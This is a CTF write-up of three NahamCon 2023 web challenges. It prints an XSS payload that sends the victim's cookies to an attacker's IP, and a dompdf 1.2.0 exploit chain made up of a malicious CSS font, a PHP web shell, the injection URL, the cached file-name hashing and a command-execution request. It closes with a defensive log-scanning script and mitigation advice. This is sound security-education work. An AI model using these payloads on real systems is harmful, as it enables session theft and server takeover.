Nahamcon CTF 2023 - Web

The third time we attempted the Nahamcon CTF, we didn't have as much availability as a team, and I ended up jumping on web with 8 hours left.

Web Challenges

Hidden Figures

(image: challenge description)

I tried to fuzz the website for common easy stuff, then tried to carve out more files from the images.

Here’s how it turned out:

(images: Thank you mario; flag)

Star-Wars

(image: challenge description)

This was a blog with only one post and a comment functionality. Here’s my go-to payload for stealing cookies with XSS:

<img src=x onerror=this.src='http://<YOUR_IP>:<YOUR_PORT>/?'+document.cookie;>

Good thinking, because apparently the admin will have a look at my comment.

(image: admin will check shortly)

(image: receive admin cookie)

With this I managed to send myself the admin cookie and simply replaced it in the browser. This revealed an Admin menu and the flag.

(image: flag.txt)

Stickers

(image: challenge description)

We are met with a form allowing us to generate a PDF file at quote.php, with all the form fields appended to the URL.

(images: a form to buy stickers; version dompdf 1.2.0 + CPDF)

This PDF was generated with dompdf 1.2.0 + CPDF. I had already downloaded and played with this exploit from GitHub before, from positive-security, so I felt at home, even without a VPN. I just modified the original files with my details as shown below, and served them with ngrok.

😉 winking at htb players.

exploit.css:

@font-face {
    font-family:'exploitfont';
    src:url('ngrokurl/exploit_font.php');
    font-weight:'normal';
    font-style:'normal';
}

exploit_font.php:

(file content available in the GitHub repo)

<?php system($_REQUEST['cmd']); ?>

This excellent blog post from optiv.com details very precisely what we’re going to do next. The following payload goes into the URL as is, as the value of the 'organization=' parameter:

http://challenge.nahamcon.com:31853/quote.php?organization=<link rel=stylesheet href='https://<your-ngrok-url>/exploit.css'>&...

(image: grab the MD5 hash of your file as the app does)

Don’t forget to grab the MD5 hash of your font file’s URL (the app uses it in the cached file name) with this command:

echo -n 'https://<your-ngrok-url>/exploit_font.php' | md5sum

or by running this Python code as per the article (the original snippet was missing a closing parenthesis):

import hashlib

# MD5 of the font URL exactly as referenced from exploit.css
print(hashlib.md5('https://<your-ngrok-url>/exploit_font.php'.encode('UTF-8')).hexdigest())

At this point I decided to fuzz the URL, to make extra sure I would have the correct file path, and confirmed the environment had a path /dompdf/lib/fonts/ where my exploit_font would be uploaded, via exploit.css.

Since we decided to add a cmd parameter, let’s include it in our URL:

http://challenge.nahamcon.com:31853/dompdf/lib/fonts/exploitfont_normal_d3c0075274e23d331a097922d6a22d90.php?cmd=cat%20/flag.txt

We can see the content of the exploit_font.php file along with the output of our PHP (containing the flag).

(image: cat flag.txt)
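As an added example (not code from the original post or from dompdf) of what a defender takes from this writeup: a Python script that reproduces the cached-font file naming described above (family_weight_md5(url).ext) and scans constructed access-log lines for the two tell-tale requests, a remote stylesheet injected into a quote.php form field and a .php file served out of the dompdf font cache. The log lines, client IPs, hex digest and the host example.invalid are all constructed.

```python
import hashlib
import re
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines (not from the original post); the
# font-cache request mirrors the path pattern shown in the writeup.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Jun/2023:10:00:01 +0000] "GET /quote.php?organization=Acme&name=Bob HTTP/1.1" 200 5120
10.0.0.9 - - [18/Jun/2023:10:00:07 +0000] "GET /quote.php?organization=%3Clink%20rel%3Dstylesheet%20href%3D%27https%3A%2F%2Fexample.invalid%2Fexploit.css%27%3E HTTP/1.1" 200 5200
10.0.0.9 - - [18/Jun/2023:10:00:12 +0000] "GET /dompdf/lib/fonts/exploitfont_normal_0123456789abcdef0123456789abcdef.php?cmd=cat%20/flag.txt HTTP/1.1" 200 77
10.0.0.5 - - [18/Jun/2023:10:00:20 +0000] "GET /dompdf/lib/fonts/dejavusans_normal_0123456789abcdef0123456789abcdef.ttf HTTP/1.1" 200 700000
"""

# Common log format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
FONT_CACHE_DIR = "/dompdf/lib/fonts/"
# <link ... href="https://..."> appearing inside a decoded query string
REMOTE_LINK_RE = re.compile(r"<link[^>]+href\s*=\s*['\"]?https?://", re.IGNORECASE)


def cached_font_name(family: str, weight: str, src_url: str, ext: str) -> str:
    """Cache file name as observed in the writeup: <family>_<weight>_<md5(src url)>.<ext>.
    Assumption: this mirrors the naming seen in the post, not dompdf's own code."""
    digest = hashlib.md5(src_url.encode("utf-8")).hexdigest()
    return f"{family}_{weight}_{digest}.{ext}"


def classify_request(line: str):
    """Return (reason, ip, path) for a suspicious request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    path, query = parts.path, unquote(parts.query)
    # A script extension served from the font cache is never legitimate.
    if path.startswith(FONT_CACHE_DIR) and path.lower().endswith(".php"):
        return ("php-in-font-cache", m.group("ip"), path)
    # A remote stylesheet smuggled into a PDF form field is the entry point.
    if path.endswith("/quote.php") and REMOTE_LINK_RE.search(query):
        return ("remote-stylesheet-in-form-field", m.group("ip"), path)
    return None


def scan_log(text: str):
    """Scan a whole log and return every hit in order."""
    return [hit for hit in map(classify_request, text.splitlines()) if hit]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Beyond logging, the fix on the application side is to disable remote resource loading in dompdf and to keep the font cache directory out of the web root.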

by Starry-Lord 18.06.23